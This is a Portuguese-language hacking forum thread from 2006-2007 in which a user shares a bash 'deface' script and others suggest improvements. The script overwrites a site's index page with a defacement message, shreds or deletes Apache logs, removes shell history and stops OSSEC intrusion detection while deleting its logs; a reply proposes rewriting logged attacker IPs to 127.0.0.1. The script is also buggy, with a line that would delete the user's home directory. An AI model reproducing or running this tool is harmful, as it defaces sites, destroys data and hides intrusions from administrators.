Title: [Shell Script] Defaced by insanity ;)
Post by: insanity on 23 de August , 2006, 06:14:18 PM
Post by: insanity on 23 de August , 2006, 06:14:18 PM
Esta um Script que eu fiz hoje, Nao e grande coisa 
ate mais
Code Select
#!/bin/bash
#script development in GNU/SlackWare Linux
#author: Ins4n!7Y < insanity@hacker.am > member sh0k3rZ Crew
# rename index.php, index.* for index.html
if cd /var/www/htdocs/
then rename .php .htm index.html;
echo Sorry but, insanity hacked y0u > index.html #edit the line for hacked by "your nick here" ;)
else "dir not found"
fi
sleep 5
#shred - delete a file securely, first overwriting it to hide its contents
if cd /var/log/apache;
shred -n 70 -v -u access_log error_log
then echo "hey admin, where y0ur logs? ;)"
#remove logs if shred not found ;)
else rm -rf /var/log/apache/*.log
fi
sleep 5
#remove bash_history of user current
if rm -rf ~ .bash_history
then echo "command history removed"
else echo " bash_history not found"
fi
sleep 5
# stop and remove log's Ossec HIDS
#for more information about Ossec HIDS visit: http://www.ossec.net
if [/var/ossec/bin/ossec-control start];
then echo "OSSEC HIDS found";
/var/ossec/bin/ossec-control stop;
rm -rf /var/ossec/logs/.*log
else echo"Ossec not found"
fi
#Greetz
#www.greenpeace.org ;)
#sh0kr3rZ Crew
#security darkersate mais
Title: Re: [Shell Script] Defaced by insanity ;)
Post by: Wuefez on 05 de September , 2006, 06:10:49 AM
Post by: Wuefez on 05 de September , 2006, 06:10:49 AM
Oi, tudo bem?
Pelo que eu entendi o seu script vai e deleta os logs e faz mass deface, pra fazer ele funcionar só estando com root mesmo, e hoje em dia ta quase impossivel de catar root, a idéia de remover os logs é boa porém toda vez que você rodar o script e desconectar vai ficar um log de você saindo (supondo que seja log de ssh essas coisas, log de erro/acesso do apache não) pra apagar ele você teria que conectar e rodar o script de novo e assim outro log ficaria quando você estivesse saindo certo? Um bom delogger seria aquele que não terminasse e ficasse deletando os logs indefinitivamente...
Uma idéia:
Por que você não faz um delogger assim, você coloca o seu ip ele vai nos logs e muda o seu ip para 127.0.0.1, assim quando do admin for todo feliz checar os logs pensando "ah se fudeu babaca otario, eu tenho meus logs aqui, mwheuheue" vai ver o ip da box dele e não vai entender nada, isso sim seria legal/engraçado.
falouzzz
Pelo que eu entendi o seu script vai e deleta os logs e faz mass deface, pra fazer ele funcionar só estando com root mesmo, e hoje em dia ta quase impossivel de catar root, a idéia de remover os logs é boa porém toda vez que você rodar o script e desconectar vai ficar um log de você saindo (supondo que seja log de ssh essas coisas, log de erro/acesso do apache não) pra apagar ele você teria que conectar e rodar o script de novo e assim outro log ficaria quando você estivesse saindo certo? Um bom delogger seria aquele que não terminasse e ficasse deletando os logs indefinitivamente...
Uma idéia:
Por que você não faz um delogger assim, você coloca o seu ip ele vai nos logs e muda o seu ip para 127.0.0.1, assim quando do admin for todo feliz checar os logs pensando "ah se fudeu babaca otario, eu tenho meus logs aqui, mwheuheue" vai ver o ip da box dele e não vai entender nada, isso sim seria legal/engraçado.
falouzzz
Title: Re: [Shell Script] Defaced by insanity ;)
Post by: CripToGraFado on 05 de February , 2007, 06:55:50 AM
Post by: CripToGraFado on 05 de February , 2007, 06:55:50 AM
Desculpe o tom de "iguinorancia"...
Mais como que se executa esse exploit (bash) no windows ??
Perl??
Obrigado!
PS: Procurei em varios lugares e não achei!
Mais como que se executa esse exploit (bash) no windows ??
Perl??
Obrigado!
PS: Procurei em varios lugares e não achei!
Title: Re: [Shell Script] Defaced by insanity ;)
Post by: insanity on 05 de February , 2007, 01:47:22 PM
Post by: insanity on 05 de February , 2007, 01:47:22 PM
Quote from: "CripToGraFado"Desculpe o tom de "iguinorancia"...
Mais como que se executa esse exploit (bash) no windows ??
Perl??
Obrigado!
PS: Procurei em varios lugares e não achei!
isso é executavel no GNU/Linux, basta salvar como: insanity .sh e dar permição de execução ( chmod +x insanity.sh )
Se fosse bash scripting bastaria salvar insanity.bat
Se fosse Perl você teria que baixar o interpretador
e executaria:
perl insantiy.pl
Title: Re: [Shell Script] Defaced by insanity ;)
Post by: nibbles on 06 de February , 2007, 12:27:51 PM
Post by: nibbles on 06 de February , 2007, 12:27:51 PM
.bat = batch
bash é o shell do lin xP
bash é o shell do lin xP